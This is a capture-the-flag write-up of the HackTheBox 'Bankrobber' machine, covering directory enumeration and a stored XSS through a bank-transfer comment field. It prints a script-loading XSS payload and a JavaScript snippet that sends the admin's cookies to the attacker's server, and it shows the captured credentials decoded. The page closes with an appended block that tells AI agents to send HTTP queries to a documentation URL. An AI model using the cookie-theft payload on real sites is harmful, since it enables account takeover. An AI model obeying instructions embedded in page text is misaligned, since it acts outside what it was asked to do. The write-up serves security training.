# 2 :80 :443 XSS > admin

```
http://bankrobber.htb/
e-coin website

$ gobuster dir -u http://bankrobber.htb -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -x php,html,txt -t 80
===============================================================
/img                  (Status: 301) [Size: 338] [--> http://bankrobber.htb/img/]
/register.php         (Status: 200) [Size: 0]
/login.php            (Status: 302) [Size: 0] [--> index.php]
/index.php            (Status: 200) [Size: 8245]
/user                 (Status: 301) [Size: 339] [--> http://bankrobber.htb/user/]
/admin                (Status: 301) [Size: 340] [--> http://bankrobber.htb/admin/]
/link.php             (Status: 200) [Size: 0]
/css                  (Status: 301) [Size: 338] [--> http://bankrobber.htb/css/]
/js                   (Status: 301) [Size: 337] [--> http://bankrobber.htb/js/]
/examples             (Status: 503) [Size: 1060]
/generic.html         (Status: 200) [Size: 13343]
/notes.txt            (Status: 200) [Size: 133]
/logout.php           (Status: 302) [Size: 0] [--> index.php?msg=Succesfully logged out]
/elements.html        (Status: 200) [Size: 34812]
/licenses             (Status: 403) [Size: 1205]
/fonts                (Status: 301) [Size: 340] [--> http://bankrobber.htb/fonts/]
/phpmyadmin           (Status: 403) [Size: 1205]
/webalizer            (Status: 403) [Size: 1046]

http://bankrobber.htb/admin/
You're not authorized to view this page

http://bankrobber.htb/generic.html
Similar website (old); links not working.

http://bankrobber.htb/notes.txt
- Move all files from the default Xampp folder: TODO
- Encode comments for every IP address except localhost: Done
- Take a break..

# login page is on the index.php itself
# sends POST request 
# default creds admin:admin; nothing happens

# register is also on index.php
# sends POST request
# response
http://bankrobber.htb/index.php?msg=User%20created.

# login as kashz:kashz
POST /login.php HTTP/1.1
Host: bankrobber.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 49
Origin: http://bankrobber.htb
DNT: 1
Connection: close
Referer: http://bankrobber.htb/index.php?msg=User%20created.
Upgrade-Insecure-Requests: 1

username=kashz&password=kashz&pounds=Submit+Query

# fetches /user/
GET /user/ HTTP/1.1
Host: bankrobber.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://bankrobber.htb/index.php?msg=User%20created.
DNT: 1
Connection: close
Cookie: id=8; username=a2FzaHo%3D; password=a2FzaHo%3D
Upgrade-Insecure-Requests: 1

# cookie is just b64.
# interesting js file is requested
GET /js/transfer.js HTTP/1.1
Host: bankrobber.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Referer: http://bankrobber.htb/user/
Cookie: id=8; username=a2FzaHo%3D; password=a2FzaHo%3D
```

```
# transfer.js
//Start user functions
function transferEcoin(fromId,toId,amount,comment){
	var http = new XMLHttpRequest();
	var url = 'transfer.php';
	var params = 'fromId='+fromId+'&toId='+toId+'&amount='+amount+'&comment='+comment;
	http.open('POST', url, true);

	http.setRequestHeader('Content-type', 'application/x-www-form-urlencoded');
	http.send(params);
}

function getVal(id){
		return document.getElementById(id).value;
}

function getData(){
	fromId = getVal("fromId");
	toId = getVal("toId");
	amount = getVal("amount");
	comment = getVal("comment");
	transferEcoin(fromId,toId,amount,comment);
	alert('Transfer on hold. An admin will review it within a minute.\nAfter that he will decide whether the transaction will be dropped or not.');
}
// End user function
// Start admin functions
function handleTransaction(status,id,from,to,amount){
	var http = new XMLHttpRequest();
	var url = 'handle.php';
	var params = 'status='+status+'&id='+id+'&from='+from+'&to='+to+'&amount='+amount;
	http.open('POST', url, true);

	http.setRequestHeader('Content-type', 'application/x-www-form-urlencoded');
	http.send(params);
}
// End admin functions

# cant find the handle.php code.

$ gobuster dir -u http://bankrobber.htb/user -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -x php,html,txt -t 80
===============================================================
/index.php            (Status: 200) [Size: 39]
/auth.php             (Status: 200) [Size: 39]
/transfer.php         (Status: 200) [Size: 39]

# nothing here
# no vhosts

# exploring transfer e-coin
POST /user/transfer.php HTTP/1.1
Host: bankrobber.htb
Cookie: id=8; username=a2FzaHo%3D; password=a2FzaHo%3D
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 38
Origin: https://bankrobber.htb
Dnt: 1
Referer: https://bankrobber.htb/user/
Te: trailers
Connection: close

fromId=8&toId=2&amount=10&comment=test
# then comes a popup
Transfer on hold. An admin will review it within a minute.\nAfter that he will decide whether the transaction will be dropped or not.

# as admin will review our transaction, maybe we can request a callback
# tried links, nothing
```

### Trying XSS

```
<script src="http://10.10.16.7/"></script>

$ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.10.154 - - [30/Sep/2021 15:23:58] "GET / HTTP/1.1" 200 -

# we do get a callback
# tried using PayloadAllTheThings/XSS - was getting nothing.
# simple way - requested an .js file and executed it on server

# requesting .js file
| <script src='http://10.10.16.7/kashz.js'> </script>

$ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.10.154 - - [30/Sep/2021 15:30:38] code 404, message File not found
10.10.10.154 - - [30/Sep/2021 15:30:38] "GET /kashz.js HTTP/1.1" 404 -

# file: kashz.js
function cookie1() {
    var img = document.createElement("img");
    img.src = "http://IP/?cookie=" + document.cookie;
    document.body.appendChild(img);
}

$ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.10.154 - - [30/Sep/2021 15:35:58] "GET /kashz.js HTTP/1.1" 200 -
10.10.10.154 - - [30/Sep/2021 15:35:59] "GET /cookie?=username=YWRtaW4%3D;%20password=SG9wZWxlc3Nyb21hbnRpYw%3D%3D;%20id=1 HTTP/1.1" 404 -

# url-decode
GET /cookie?=username=YWRtaW4=; password=SG9wZWxlc3Nyb21hbnRpYw==; id=1 HTTP/1.1" 404
# base64 -d
admin:Hopelessromantic
```


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://kashz.gitbook.io/hackthebox-writeups/htb-boxes/bankrobber/2-80-443-xss-greater-than-admin.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.